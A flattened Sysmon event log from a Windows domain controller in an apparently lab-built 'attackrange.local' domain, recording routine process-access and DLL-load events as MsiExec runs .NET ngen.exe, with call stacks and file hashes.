14:57:23.233{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-6C0C-00000000BB01}3712c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.218{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-6A0C-00000000BB01}5708c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.218{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-6A0C-00000000BB01}5708c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.218{A7A01FEF-EBD3-607E-6A0C-00000000BB01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.202{A7A01FEF-EBD3-607E-6B0C-00000000BB01}37686656C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-6A0C-00000000BB01}5708c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.186{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-6B0C-00000000BB01}3768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.186{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-6A0C-00000000BB01}5708c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.186{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-6A0C-00000000BB01}5708c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.171{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-680C-00000000BB01}2660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.171{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-680C-00000000BB01}2660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.171{A7A01FEF-EBD3-607E-680C-00000000BB01}2660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.155{A7A01FEF-EBD3-607E-690C-00000000BB01}54566936C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-680C-00000000BB01}2660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.155{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-690C-00000000BB01}5456C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.139{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-680C-00000000BB01}2660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.139{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-680C-00000000BB01}2660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.139{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-660C-00000000BB01}5540c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.139{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-660C-00000000BB01}5540c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.139{A7A01FEF-EBD3-607E-660C-00000000BB01}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.108{A7A01FEF-EBD3-607E-670C-00000000BB01}13167108C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-660C-00000000BB01}5540c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.108{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-670C-00000000BB01}1316C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.093{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-660C-00000000BB01}5540c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.093{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-660C-00000000BB01}5540c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.093{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-640C-00000000BB01}6592c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.093{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-640C-00000000BB01}6592c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.093{A7A01FEF-EBD3-607E-640C-00000000BB01}6592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.061{A7A01FEF-EBD3-607E-650C-00000000BB01}65803544C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-640C-00000000BB01}6592c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.061{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-650C-00000000BB01}6580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.061{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-640C-00000000BB01}6592c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.061{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-640C-00000000BB01}6592c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.046{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-620C-00000000BB01}3596c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.046{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-620C-00000000BB01}3596c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 